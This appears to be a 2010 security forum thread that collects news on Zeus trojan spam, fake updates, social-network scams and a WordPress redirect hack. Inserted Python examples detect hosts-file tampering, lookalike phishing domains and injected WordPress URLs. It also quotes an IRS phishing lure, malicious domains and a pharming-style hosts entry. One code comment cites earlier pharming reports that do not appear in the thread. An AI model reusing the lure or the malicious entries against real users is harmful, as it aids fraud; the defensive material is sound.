18 March 2010 - "... the file that spreads the infection was -still- being distributed Wednesday evening on a European site operated by the consumer-products company. According to this VirusTotal analysis*, UsbCharger_setup_V1_1_1.exe is flagged as malicious by 24 of the 42 leading anti-virus firms. To make sure it wasn't a false positive, The Register checked with anti-virus firms Immunet and Trend Micro, both of which said the infection is real. Contrary to the VirusTotal results, the threat is also flagged by Symantec's Norton AV app, Immunet added. Trend Micro Senior Threat Researcher Paul Ferguson said his company's AV product also protects against it by flagging a key dll file, rather than the executable file. Microsoft labels the trojan as Arurizer.A and warns that it installs a backdoor on user machines that allows attackers to upload, download, and delete files at will, install additional malware and carry out other nefarious deeds. Twelve days ago, Energizer pledged to mount an investigation into how such a gaffe could have happened. The company has yet to release the results of that probe... Sometimes, the low-tech - or no-tech - solution is the way to go."
* http://www.virustotal.com/analisis/76776094c46a6d9c4315489c339a124a121a0776b16bef9a661156864b6eb1d7-1268871703
File UsbCharger_setup_V1_1_1.exe received on 2010.03.18 00:21:43 (UTC)
Result: 24/42 (57.14%)
:mad::mad:
AplusWebMaster
2010-03-18, 22:23
FYI...
Zeus trojan campaign Warning - SPAM
- http://www.us-cert.gov/current/#us_cert_warns_against_zeus
March 17, 2010 - "US-CERT is aware of public reports of malicious code circulating via spam email messages impersonating the Department of Homeland Security (DHS). The attacks arrive via unsolicited email messages that may contain subject lines related to DHS or other government activity. These messages may contain a link or attachment. If users click on this link or open the attachment, they may be infected with malicious code, including the Zeus Trojan..."
:mad::mad:
AplusWebMaster
2010-03-19, 13:44
FYI...
Naming and Shaming ‘Bad’ ISPs
- http://www.krebsonsecurity.com/2010/03/naming-and-shaming-bad-isps/
March 19, 2010 - "Roughly two years ago, I began an investigation that sought to chart the baddest places on the Internet, the red light districts of the Web, if you will. What I found in the process was that many security experts, companies and private researchers also were gathering this intelligence, but that few were publishing it... Fast-forward to today, and we can see that there are a large number of organizations publishing data on the Internet’s top trouble spots... Brett Stone-Gross, a PhD candidate in UCSB’s Department of Computer Science, said he and two fellow researchers there sought to locate ISPs that exhibited a consistently bad reputation... “The networks you find in the FIRE rankings* are those that show persistent and long-lived malicious behavior,” Stone-Gross said... For instance, if you click this link** you will see the reputation history for ThePlanet.com..."
Top 20 Malicious Autonomous Systems...
* http://maliciousnetworks.org/index.php
** http://maliciousnetworks.org/chart.php?as=AS21844
- http://maliciousnetworks.org/chart.php?as=AS15169
:fear::fear:
AplusWebMaster
2010-03-22, 02:36
FYI...
Twitter phishing attack...
- http://www.f-secure.com/weblog/archives/00001911.html
March 21, 2010 - "Today there's a phishing run underway in Twitter, using Direct Messages ("DMs"). These are private one-to-one Tweets inside Twitter... If you mistakenly give out your credentials, the attackers will start sending similar Direct Messages to your contacts, posing as you. The ultimate goal of the attackers is to gain access to a large number of valid Twitter accounts, then use these accounts to post Tweets with URLs pointing to malicious websites which will take over users' computers when clicked... The good news is that Twitter is already filtering these from being posted, although it's unclear if they are also removing already-delivered DMs. Also, the Twitter built-in link shorteners (twt.tl and bit.ly) already detect the URLs as malicious."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2010-03-22, 15:25
FYI...
Malicious medical ads flood users’ Inboxes
- http://blog.trendmicro.com/malicious-medical-ads-flood-users%E2%80%99-inboxes/
Mar. 21, 2010 - "TrendLabs observed an increase in malicious medical advertisements spammed to users’ e-mail inboxes. Two of the samples our engineers obtained looked legitimate, even had professional-looking graphics... Another was just the normal, everyday, plain-text spam... The spammed messages enticed recipients to purchase the medicines the scammers were selling. These lured recipients with supposed huge discounts, ranging from 70–80% off of all products. The messages also sported links that when clicked redirected users to a spoofed online store that sold male organ-enhancing pills. More recently, a spam run that uses a new feature was discovered. Instead of asking recipients to click an embedded link or an image, it asked them to open the .JPG file attachment—an image of Viagra and Cialis—along with the line, “DO NOT CLICK, JUST ENTER (a particular URL) IN YOUR BROWSER.” The spammed messages also contained a series of salad words to avoid being filtered..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2010-03-23, 16:41
FYI...
Facebook "Dislike button" likes Hotbar
- http://sunbeltblog.blogspot.com/2010/03/facebook-dislike-button-likes-hotbar.html
March 23, 2010 - "... It seems the tactic of offering up Firefox (but giving you something else entirely) is going to be around for a little while. Below is a site promoting a Firefox .xpi called “The Dislike Button”, designed to let you add an “I dislike this” note to Facebook posts... The domain is dislikes(dot)info. Note the “Get Firefox” button at the top... you’re given the option of downloading a setup file from Hotbar…not exactly the Firefox download you were expecting. Should the end-user install it thinking this will give them Firefox, they’re very much mistaken... What they actually get is the option to download Hotbar (and no Firefox), complete with a preticked ShopperReports checkbox... Additionally, there’s a text link further down the page asking you to “Get Firefox now” which also directs you to the Hotbar install... I think... I dislike this."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2010-03-23, 19:45
FYI...
Skype toolbar for Outlook SCAM
- http://securitylabs.websense.com/content/Alerts/3586.aspx
03.23.2010 - "Websense... has discovered a new wave of email attacks targeting the Skype Email Toolbar. Up to now, the amount of spam is not large, but we believe it will increase. The spam email message contains a file attachment named SkypeToolbarForOutlook.zip, which could easily deceive users but is in fact a backdoor trojan that has a very low AV detection*. The spam email copies the look and feel of the legitimate application from Skype..."
* http://www.virustotal.com/analisis/9c04944960cc8abac04cb319c9e98856cf070331ab482d6372ad10a5a6d92751-1269327702
File SkypeToolbarForOutlook.exe received on 2010.03.23 07:01:42 (UTC)
Result: 6/42 (14.29%)
(Screenshots available at the Websense URL above.)
Skype SPIM (Instant Messaging SPAM)
- http://www.m86security.com/labs/i/Skype-SPIM-Instant-Messaging-Spam--,trace.1289~.asp
March 26, 2010 - "With over 520 million users, Skype is the most popular VoIP (Voice over IP) application available today. It provides a great service, allowing families, friends and colleagues to connect to one another through voice and video chat across the globe. However, being so popular doesn’t come without a price. The price that is paid is in the form of Skype SPIM (Instant Message Spam). These messages are pushed out to a large percentage of Skype users on a regular basis. The SPIM messages can range from the common pharmaceutical product spam, to fake OEM software, investment scams, replica bags and watches, and adult dating site spam..."
(More detail and screenshots at the URL above.)
:mad:
AplusWebMaster
2010-03-24, 12:54
FYI...
ZBOT variants targeting European Banks
- http://blog.trendmicro.com/new-zbot-variants-targeting-european-banks/
March 23, 2010 - "... new ZBOT variant mainly targeting four European countries’ banking systems in Italy, England, Germany, and France. Trend Micro detects this variant as TROJ_ZBOT.BYP. It targets major consumer European Banks and financial institutions with high-profile clientele. The targeted companies include the major UniCredit Group Subsidiary Bank of Rome; U.K.-based Abbey National (more commonly known as Abbey); Hong Kong’s HSBC; Germany’s leading IT service provider in the cooperative financial system, the FIDUCIA Group; and one of France’s largest retail banks, Crédit Mutuel... The ZeuS toolkit enables cybercriminals to create and customize their own remote-controlled malware. The infected machine then becomes part of the criminal ZeuS botnet. ZBOT variants are information stealers specializing in robbing online banking information from victims and sending back the information to its command-and-control (C&C) server. At its most basic level, ZeuS has always been known for engaging in criminal activities, as it signals a new wave of online criminal business enterprises wherein different organizations can cooperate with one another to perpetrate outright online theft and fraud... The domains used by TROJ_ZBOT.BYP are both hosted on the same server, which is located in Serbia under a registered name. The IP address used and its registered name are both well-known for being part of FAKEAV-hosting domains and previous Canadian pharmacy spam campaigns..."
- http://threatinfo.trendmicro.com/vinfo/web_attacks/ZeuS_ZBOTandKneberConnection.html
"... Since 2007... Trend Micro has seen over 2,000 ZBOT detections and the numbers continue to rise..."
:mad:
AplusWebMaster
2010-03-25, 02:12
FYI...
Fake Apple App Store Malicious SPAM
- http://securitylabs.websense.com/content/Alerts/3587.aspx
03.24.2010 - "Websense... has discovered that Apple's App Store has become the latest target for email attacks and spam. App Store is the service provided by Apple Inc. as a platform to purchase and download applications for iPhone®, iPod touch®, and iPad™. The attack comes in the form of a fake invoice email. With Apple's App Store being one of the most popular shopping platforms for multimedia, this kind of App Store invoice email is familiar to users and tends to be received frequently. As demonstrated here, cyber-criminals clearly jump at a chance to spread their spam using any available means. The content in this campaign resides on compromised Web sites and serves a combination of pharmaceutical spam along with exploits that are delivered in the background. Some of the messages serve only pharmaceutical spam and some combine spam with exploits. In the example below, clicking the link in the message redirects the user to a site with a single link labeled "visit". In the background, a known exploit pack called "Eleonore" is delivered to the user's machine. If the user clicks on the link, they are redirected to a "Canadian Pharmacy" Web site. In this particular attack instance the file dropped by the exploit pack has 29% detection rate*..."
* http://www.virustotal.com/analisis/5e99fa5527e737e38ecea80c5a9d40759003f739fe6649cb501496a884ad75ae-1269442230
File updates.exe received on 2010.03.24 14:50:30 (UTC)
Result: 12/41 (29.27%)
(Screenshots available at the Websense URL above.)
- http://blog.trendmicro.com/spammers-spoof-the-apple-store/
Mar. 25, 2010
:mad:
AplusWebMaster
2010-03-25, 02:29
FYI...
Pictures Ruse Used to SPAM Zeus/Zbot
- http://blog.trendmicro.com/spam-with-%E2%80%9Cpictures%E2%80%9D-used-to-spread-zbot/
Mar. 24, 2010 - "... fresh wave of spammed messages that were used to spread another ZBOT variant of the infamous ZeuS botnet. These messages warned users that a “jerk” posted photos of them and contained a link to the said images... the spammed messages appear to be from innocent users that the recipients presumably knew. In addition, they were also signed or at least had the sender’s name at the end of the message. In the sample above, the sender’s name has been blurred to protect his/her identity. Combined, this may lead users to believe the message is legitimate. However, the link does not go to any legitimate social-networking or photo-hosting site. Users were instead prompted to download a “photo archive”. In addition, the download page also contains a malicious iframe, which leads to a website that previously hosted the Phoenix Exploit’s Kit, which was designed to take advantage of vulnerabilities in several popular applications like Adobe Flash, Internet Explorer (IE), Microsoft Office, and Mozilla Firefox..."
(Screenshots available at the URL above.)
- http://threatinfo.trendmicro.com/vinfo/articles/securityarticles.asp?xmlfile=030210-ZBOT.xml
- http://ddanchev.blogspot.com/2010/03/zeus-crimewareclient-side-exploits.html
March 24, 2010 - "... Updates will be posted as soon as new developments emerge. Consider going through the 'related posts', to catch up with the gang's activities for Q1, 2010..." ("Related posts" listed there)
:mad:
AplusWebMaster
2010-03-25, 23:17
FYI...
Closer look on Swizzor
- http://techblog.avira.com/2010/03/25/closer-look-on-swizzor/en/
March 25, 2010 - "We were analysing a recent version of Swizzor – an Adware which Avira detects as TR/Dldr.Swizzor.Gen – and after getting past the first encryption layers of the software, we stumbled over a few interesting strings in the malware. Quite obviously it installs a browser helper object (BHO, an Internet Explorer plug-in) which does some form of search hijacking. In case users get infected with Swizzor, they usually experience a -redirected- start page and a few pop-ups with advertisements for online poker or potency pills... Different Swizzor samples also contain different messages and links. Also, the malware is highly polymorphic. The Swizzor sample also contains a lengthy list of URLs which it blocks within the windows hosts file by redirecting them to localhost (127.0.0.1). Interestingly, those URLs all point to FakeAV or RogueAV... Also we see reports by users on the net who are victims of a Swizzor infection and didn’t download such “sponsored software” knowingly, but installed it for example with the “Windows Live Messenger” -add-on “Windows Live Plus! Messenger” where users can choose whether to install the “sponsor software” or not. Always keep an open eye on whether the software you are going to install really is free or installs further stuff on your computer. You should find hints pointing to such add-ons in the EULA of the software."
:fear:
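The hosts-file tampering described above (a block of names pinned to 127.0.0.1, and, in the thread's earlier pharming reports, a trusted name pointed at an attacker-chosen address) can be audited with a short parser. Added example, not code from Avira or the post; the hosts content and domain names are constructed placeholders.

```python
"""Added example (not from the post or Avira): audit a hosts file for names
sinkholed to loopback and for watched domains that have any hosts entry at all."""
import ipaddress

# Constructed sample; the domain names are placeholders, not real indicators.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 localhost
# Swizzor-style block: rival rogue AV sites pointed at loopback
127.0.0.1 fakeav-one.example
127.0.0.1 rogueav-two.example www.rogueav-two.example
# pharming-style entry: a bank name mapped to an attacker-chosen address
198.51.100.7 www.mybank.example
"""

BENIGN_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}


def parse_hosts(text):
    """Yield (line_number, ip_address, hostname) for each mapping, ignoring
    comments and lines whose first field is not a valid IPv4/IPv6 address."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for host in fields[1:]:
            yield lineno, ip, host.lower().rstrip(".")


def matches_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def audit_hosts(text, watched_domains):
    """Return {'hijacked': [(line, host, ip)], 'sinkholed': [host, ...]}.
    'hijacked' = any entry for a watched domain (a bank or update site should
    never be in hosts at all); 'sinkholed' = other names sent to loopback or
    0.0.0.0, which is how Swizzor's blocklist of rival FakeAV sites looks."""
    watched = [d.lower() for d in watched_domains]
    hijacked, sinkholed = [], []
    for lineno, ip, host in parse_hosts(text):
        local = ip.is_loopback or ip.is_unspecified
        if any(matches_domain(host, d) for d in watched):
            hijacked.append((lineno, host, str(ip)))
        elif local and host not in BENIGN_NAMES:
            sinkholed.append(host)
    return {"hijacked": hijacked, "sinkholed": sinkholed}


if __name__ == "__main__":
    # Real use: audit_hosts(open(r"C:\Windows\System32\drivers\etc\hosts").read(), [...])
    print(audit_hosts(SAMPLE_HOSTS, ["mybank.example"]))
```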
AplusWebMaster
2010-03-26, 01:15
FYI...
Fake lawsuit notification Attack
- http://www.f-secure.com/weblog/archives/00001917.html
March 25, 2010 - "A few days ago, we encountered an e-mail with a malicious RTF attachment. It was sent with a supposed lawsuit notification message. The e-mail didn't mention any company by name and took a shotgun, rather than targeted, approach... At this point, it appears that the attachment has been replaced by a hyperlink pointing to the Marcus Law Center... It is difficult to determine whether or not the MLC site is compromised or just completely bogus. Their Our Firm page text borrows heavily from a New York lawyer's site, but that could just be a case of "honest" plagiarism. In any case, our browsing protection feature is now blocking the sub-directory hosting the malicious file as unsafe. The RTF file includes an embedded object that acts as a trojan dropper (Trojan-Dropper:W32/Agent.DIOY) and it drops a downloader (Trojan-Downloader:W32/Lapurd.D), which then attempts to connect to a server located in Southern China. The earlier attachment that we saw also attempted to connect to a server in China. Updated to add: SANS diary reports* that a number of .edu sites have also received a similar message. The domain, touchstoneadvisorsonline .com, is hosting the same RTF (.doc) file..."
* http://isc.sans.org/diary.html?storyid=8497
Last Updated: 2010-03-25 13:30:36 UTC - "An email is being sent out warning the recipient of a "Copyright Lawsuit filed against you." We received a copy here and a number of .EDUs have reported its receipt... Currently only a few AV solutions detect the initial document:
- http://www.virustotal.com/analisis/9b762ff9d2103022bf1476f2c55db91475f31526522716e827875801f92a0d87-1269486837 ..."
File r439875.doc-25mar10 received on 2010.03.25 03:13:57 (UTC)
Result: 7/42 (16.67%)
- http://isc.sans.org/diary.html?storyid=8506
Last Updated: 2010-03-26 14:19:15 UTC
> http://www.virustotal.com/analisis/bde73e8d9df88795b32679bf3c489ce4e39f29ca3e55ce00cbf497335a24c8ee-1269619641
File suit.exe received on 2010.03.26 16:07:21 (UTC)
Result: 21/42 (50.00%)
- http://www.us-cert.gov/current/#copyright_infringement_lawsuit_email_scam
March 26, 2010 - "... messages may contain malicious attachments or web links. If a user opens the attachment or follows the link, malicious code may be installed on the user's system..."
- http://ddanchev.blogspot.com/2010/03/copyright-lawsuit-filed-against-you.html
March 29, 2010
:mad:
AplusWebMaster
2010-03-26, 17:02
FYI...
Zeus wants to do your taxes
- http://isc.sans.org/diary.html?storyid=8503
Last Updated: 2010-03-25 20:44:53 UTC ...(Version: 2) - "... received reports of suspicious emails claiming to be from the IRS. It's a common scheme to get a user to click and run an executable. It looks like zeus/zbot to me...The email looks something like...
Subject: Underreported Income Notice
Taxpayer ID: <recipient>-00000198499136US
Tax Type: INCOME TAX
Issue: Unreported/Underreported Income (Fraud Application)
Please review your tax statement on Internal Revenue Service (IRS) website (click on the link below):
Internal Revenue Service
hxxp ://www.irs.gov.assewyx .co.uk/fraud.applications/application/statement.php?
The download in this particular link was "tax-statement.exe"..."
Child Tax Credit... Phishing Bait
- http://www.symantec.com/connect/blogs/child-tax-credit-new-phishing-bait
March 25, 2010
- http://www.us-cert.gov/current/#us_tax_season_phishing_scams
March 26, 2010 - "... tax season malware campaign. This malware campaign may be using malicious code commonly known as Zeus or Zbot..."
- http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5
"... The IRS does -not- initiate taxpayer communications through e-mail..."
:mad:
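The link in the IRS lure above puts the trusted name in front of someone else's domain (irs.gov.assewyx.co.uk). Added example, not from the SANS diary or any of the linked sites: it extracts URLs from a message and flags hosts where a trusted name appears as leading labels of a different registered domain. The message body is constructed from the quoted fields; the two-label suffix set is a small stand-in for a public-suffix list.

```python
"""Added example (not from the SANS diary): pull URLs out of a message and flag
hosts that carry a trusted name such as irs.gov as a leading subdomain of some
other registered domain, the pattern in the link quoted above."""
import re
from urllib.parse import urlsplit

# Constructed message body modelled on the quoted IRS lure; the link is the
# defanged one from the post, re-joined so urlsplit can parse it.
SAMPLE_EMAIL = """\
Subject: Underreported Income Notice
Tax Type: INCOME TAX
Please review your tax statement on Internal Revenue Service (IRS) website:
http://www.irs.gov.assewyx.co.uk/fraud.applications/application/statement.php?
"""

URL_RE = re.compile(r"""https?://[^\s<>"']+""", re.IGNORECASE)

# Small stand-in for a public-suffix list; enough for the .co.uk case here.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "gov.uk", "ac.uk", "com.au", "co.jp"}


def registered_domain(host):
    """Registrable part of a host name: last two labels, or three under a
    known two-label suffix (assewyx.co.uk, not co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify_host(host, brands):
    """'brand-owned' if the registered domain is a brand; 'lookalike' if a brand
    name appears as labels inside a different registered domain; else 'other'."""
    host = host.lower().rstrip(".")
    reg = registered_domain(host)
    for brand in (b.lower() for b in brands):
        if reg == brand:
            return "brand-owned"
        # Label-boundary match: ".irs.gov." inside ".www.irs.gov.assewyx.co.uk."
        if ("." + brand + ".") in ("." + host + "."):
            return "lookalike"
    return "other"


def scan_message(text, brands):
    """Return [(url, verdict)] for every URL found in the message text."""
    results = []
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname or ""
        results.append((url, classify_host(host, brands)))
    return results


if __name__ == "__main__":
    for url, verdict in scan_message(SAMPLE_EMAIL, ["irs.gov"]):
        print(verdict, url)
```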
AplusWebMaster
2010-03-29, 19:48
FYI...
Fake update utilities...
- http://www.theregister.co.uk/2010/03/29/software_update_trojan/
29 March 2010 - "Miscreants have begun creating malware that overwrites software update applications from Adobe and others. Email malware that poses as security updates from trusted companies is a frequently used hacker ruse. Malware posing as update utilities, rather than individual updates, represents a new take on the ruse... recently detected Fakeupver trojan establishes a backdoor on compromised systems while camouflaging its presence by posing as an Adobe update utility. The malware camouflages itself by using the same icons and version number as the official package... "... malware is written in Visual Basic, faking such popular programs as Adobe, DeepFreeze, Java, Windows, etc. In addition, on being executed, they immediately turn on the following services: DHCP client, DNS client, Network share and open port to receive hacker’s commands..."
:mad:
AplusWebMaster
2010-03-30, 04:59
FYI...
Fake Facebook AV
- http://www.f-secure.com/weblog/archives/00001920.html
March 29, 2010 - "Facebook-specific antivirus application sounds like a good idea? Maybe not. One of our analysts saw this particular application claiming to be an antivirus wreak havoc on his Friends list. Of course, there is no such thing... If a Friend looking through the photos then clicks on the app's (apparently randomly generated) link... you might end up with a series of albums... Once installed on one Friend's account, this application tags 20 Friends into a picture... You can find more information about this, including instructions on how to remove the tags on the photos, at FacebookInsider*.
Updated to add: Examples include Antivirus in Focebook and F'acebook antivirus.
Notice the -misspelling- of Facebook in both names. Facebook is already in the process of removing and preventing such rogue apps."
(Screenshots available at the URL above.)
* http://thefacebookinsider.com/2010/03/warning-facebook-antivirus-will-virally-spam-your-friends/
:mad:
AplusWebMaster
2010-04-01, 15:10
FYI...
SPAM site registrations flee China for Russia - A Little Sunshine
- http://www.krebsonsecurity.com/2010/03/spam-site-registrations-flee-china-for-russia/
March 31, 2010 - "... In early January 2010, and indeed in the months leading up to the new year, the percentage of domains advertised in spam registered in the .cn space dwarfed the number of .ru spam-related domains, according to figures gathered by the University of Alabama at Birmingham. But by mid-January, the number of .cn spam domains began to fall off dramatically, while the number of .ru spam domains increased markedly, UAB found (see graphic*). Gary Warner, director of research in computer forensics at UAB Birmingham, said a sizable share of spam-related new domain registrations continue to come through the .com space — which is served by hundreds of domain name registrars. But he said the biggest bulk registrations for spam domains routinely came out of .cn, particularly those associated with rogue online pharmacies. “The .com never had the volumes of abuse you’d see at one time in .cn, where you’d typically have one guy registering hundreds or thousands of spam domains every day,” Warner said. There is a decent chance that the spammers will move to another country-code registrar soon. Beginning April 1, Russia’s Coordination Center for domain registration will require individuals and businesses applying for a .ru address to provide a copy of a passport or legal registration papers. Warner said he’s looking forward to seeing a similar exodus from Russia in the weeks ahead. “I’m excited about the prospects of seeing the [number of] .ru spam domains going down just like we saw with China,” he said... ISC’s spam traps had identified more than 10,000 unique domain names being advertised in spam. More than 1,870 of those domains were tied to recently registered rogue pharmacies, and of those, 491 were registered in the .com space, while 18 were from .cn and 1,366 were at .ru Web sites..."
* http://www.krebsonsecurity.com/wp-content/uploads/2010/03/cnruspam.jpg
:fear::fear:
AplusWebMaster
2010-04-08, 06:04
FYI...
Korea: 31% of malware origins - March 2010
- http://sunbeltblog.blogspot.com/2010/04/number-of-infected-computers-spikes-in.html
April 07, 2010 - Number of infected computers spikes in Korea - "Hong Kong-based security firm Network Box reported that Korea was the country of origin for 31.1 percent of the malware on the Internet in March*. In February the country only pumped out 8.9 percent, leading researchers to theorize that there has been a huge increase in infected machines there pushing out phishing spam. Network Box includes phishing in its calculations of monthly malware statistics. They also include North and South Korea as one country in their categories, but say the lack of public computers in the North means that South Korea is the country of origin for the bulk of the statistic. The US was second on the list at 9.34 percent..."
* http://www.infosecurity-us.com/view/8547/korea-reigns-as-king-of-malware-threats-/
- http://response.network-box.com/
:fear::mad:
AplusWebMaster
2010-04-09, 23:36
FYI...
Facebook SCAM again - fake Ikea page...
- http://www.computerworld.com/s/article/9175158/Scam_Facebok_page_attracts_40_000_victims_seeking_Ikea_gift_card?taxonomyId=17
April 9, 2010 - "... latest example of a new and pernicious trend on the social-networking site as scammers - usually disreputable online marketers trying to earn review by generating Web traffic - have flooded Facebook with these fake gift card pages over the past months. In late March, a similar $1,000 Ikea gift card scam took in more than 70,000 victims, and just last week another scam Facebook page offering a $500 Whole Foods gift certificate was widely reported. Friday's scam page had taken in more than 37,000 users by 11:30 a.m. Pacific Time, offering them a $1,000 gift certificate in exchange for promoting Ikea to their friends. At that time, the page was gaining new fans at the rate of about 5,000 per hour. The promotion, the page said, was only available for one day. To participate, users must become a fan of the fake Ikea page, hosted on Facebook, and then invite all their friends to become fans. They are then directed to an affiliate marketing page hosted by GiftDepotDirect .com, where they are asked personal information such as name, address, date of birth and home telephone number. After that step, the victim is told to sign up for two online marketing offers - these ones with legitimate Web sites such as Netflix and CreditReport .com - in order to claim the gift card. The promised cards in these scams never show up..."
:fear::mad:
AplusWebMaster
2010-04-10, 21:14
FYI...
Wordpress blogs hit by ‘Networkads.net’ hack
- http://krebsonsecurity.com/2010/04/hundreds-of-wordpress-blogs-hit-by-networkads-net-hack/
April 9, 2010 - "A large number of bloggers using Wordpress are reporting that their sites recently were hacked and are redirecting visitors to a page that tries to install malicious software. According to multiple postings on the Wordpress user forum and other blogs, the attack doesn’t modify or create files, but rather appears to inject a Web address — “networkads .net/grep” — directly into the target site’s database, so that any attempts to access the hacked site redirects the visitor to networkads .net. Worse yet, because of the way the attack is carried out, victim site owners are at least temporarily locked out of accessing their blogs from the Wordpress interface. It’s not clear yet whether the point of compromise is a Wordpress vulnerability (users of the latest, patched version appear to be most affected), a malicious Wordpress plugin, or if a common service provider may be the culprit. However, nearly every site owner affected so far reports that Network Solutions is their current Web hosting provider... A scan of the file delivered by that redirect shows rather poor detection by most anti-virus products: Virustotal.com found that only 7 out of 39 anti-virus products detected it as malicious*...
The following how-to-repair instructions appear to have worked for a number of Network Solutions customers hit by this attack.
- Log in to your site at networksolutions.com
- Using Network Solution’s MySQL admin console, browse to the wp_options table and change the value for “siteurl” to your blog’s URL. For example: “http://example.com/wordpress”.
- Edit wp_config.php to override value of SITEURL (this way even if the database value is altered, it gets overridden by the config value).
Still, that fix may only be temporary ..."
* http://www.virustotal.com/analisis/39d86b03319e2636a1e0b869fa4b89ed7adcebb61d8ad1000797cab84b03e777-1270828595
File 8d2c18111ad5d4815c4b610c0fa30043e received on 2010.04.09 15:56:35 (UTC)
Result: 7/39 (17.95%)
- http://google.com/safebrowsing/diagnostic?site=networkads.net/
"Site is listed as suspicious - visiting this web site may harm your computer...
last time Google visited this site was on 2010-04-09, and the last time suspicious content was found on this site was on 2010-04-09... Malicious software includes 29 exploit(s), 4 trojan(s)..."
- http://blog.sucuri.net/2010/04/details-on-network-solutions-wordpress.html
April 10, 2010
Alert: WordPress Blog & Network Solutions
- http://blog.networksolutions.com/2010/alert-wordpress-blog-network-solutions/
Update: 04/10/2010
- http://blog.trendmicro.com/wordpress-blogs-suffer-mass-compromise/
Apr. 11, 2010
:mad::fear:
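The repair steps above come down to two checks: whether any wp_options value points at a host other than your own, and pinning the site URL in wp-config.php so the database value no longer decides where visitors go. Added example, not code from Krebs, Network Solutions or WordPress: SQLite stands in for the MySQL console, the rows are constructed, and the injected value is the address quoted in the post. WP_SITEURL and WP_HOME are WordPress's own wp-config.php constants.

```python
"""Added example (not from Krebs, Network Solutions or WordPress): audit a
wp_options table for foreign URLs and emit the wp-config.php override."""
import re
import sqlite3
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s"'<>;]+""", re.IGNORECASE)


def seed_constructed_table(conn):
    """Constructed wp_options rows: 'siteurl' has been overwritten with the
    address quoted in the post; the other rows are what a clean blog would hold."""
    conn.execute("CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, "
                 "option_name TEXT NOT NULL, option_value TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value) VALUES (?, ?)",
        [("siteurl", "http://networkads.net/grep"),
         ("home", "http://example.com/wordpress"),
         ("blogname", "Example Blog"),
         ("upload_url_path", "http://example.com/wordpress/wp-content/uploads")])


def audit_wp_options(conn, expected_host):
    """Return [(option_name, foreign_host, url)] for every option value that
    embeds an http(s) URL whose host is not expected_host. Checking every row,
    not just siteurl/home, also catches URLs injected into other options."""
    findings = []
    rows = conn.execute("SELECT option_name, option_value FROM wp_options")
    for name, value in rows:
        for url in URL_RE.findall(value):
            host = (urlsplit(url).hostname or "").lower()
            if host and host != expected_host.lower():
                findings.append((name, host, url))
    return findings


def wp_config_override(site_url):
    """The wp-config.php lines behind the third repair step: pin WP_SITEURL (and
    WP_HOME) so a tampered database value no longer controls redirects."""
    return (f"define('WP_SITEURL', '{site_url}');\n"
            f"define('WP_HOME', '{site_url}');\n")


def demo():
    """Run the audit against the constructed table; returns the findings."""
    conn = sqlite3.connect(":memory:")
    seed_constructed_table(conn)
    return audit_wp_options(conn, "example.com")


if __name__ == "__main__":
    print(demo())
    print(wp_config_override("http://example.com/wordpress"))
```
Against a live blog, run the same SELECT through the hosting provider's MySQL console and compare the hosts by eye if you cannot script against it.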
AplusWebMaster
2010-04-13, 16:04
FYI...
Facebook game Farm Town serving "malvertisement"...
- http://www.theregister.co.uk/2010/04/12/farm_town_malicious_ads/
12 April 2010 - "... Facebook game with more than 9 million users... Farm Town..."
>>> http://msmvps.com/blogs/spywaresucks/archive/2010/04/12/1763312.aspx
Apr 12 2010 18:55 - "... screenshot of the malvertisement... (leads to) run-of-the-mill fake antivirus software..."
- http://msmvps.com/blogs/spywaresucks/archive/2010/04/12/1763300.aspx
Apr 12 2010 16:45
:mad:
AplusWebMaster
2010-04-13, 18:34
FYI...
Copyright ransomware in the Wild...
- http://ddanchev.blogspot.com/2010/04/copyright-violation-alert-themed.html
April 12, 2010 - "The copyright violation alert themed ransomware campaign (Copyright violation alert ransomware in the wild; ICPP Copyright Foundation is fake*) is not just a novel approach for extortion of the highest amount of money seen in ransomware variants so far, but also, offers interesting clues into the multitasking mentality of the cybercriminals whose campaigns have already been profiled..."
* http://www.f-secure.com/weblog/archives/00001931.html
SSDD ...
- http://isc.sans.org/diary.html?storyid=8620
Last Updated: 2010-04-13 13:35:41 UTC
:mad:
AplusWebMaster
2010-04-16, 14:17
FYI...
Q1 2010: 0-day exploit deliveries...
- http://blog.scansafe.com/journal/2010/4/9/attackers-triple-play-to-deliver-zero-days.html
April 9, 2010 - "ScanSafe STAT has been investigating an ongoing series of attacks which has been a hotbed for zero day exploits over the first quarter of 2010. The attackers are using three layers of legitimate sites. Two layers are compromised websites used to host malicious content that is then subsequently pushed to a third layer of legitimate websites via syndicated ads. In its current rendition, the attacks are being delivered to financial services themed websites. Previous rounds have been delivered via syndicated ads on Wikia-hosted websites and assorted game forums. The ads pull content from an attacker-planted HTML file contained in the /images directory of the compromised site. (Method of compromise is not known, but it's presumed to be a result of stolen FTP credentials)... Through the course of these attacks which began in late January, the attackers have been quick to incorporate the latest zero day du jour. These have included:
CVE-2010-0806 Internet Explorer uninitialized memory corruption vulnerability
CVE-2009-4324 "use-after-free" vulnerability in Adobe Reader/Acrobat
CVE-2009-3867 HsbParser.getSoundBank buffer overflow vulnerability in Sun Java
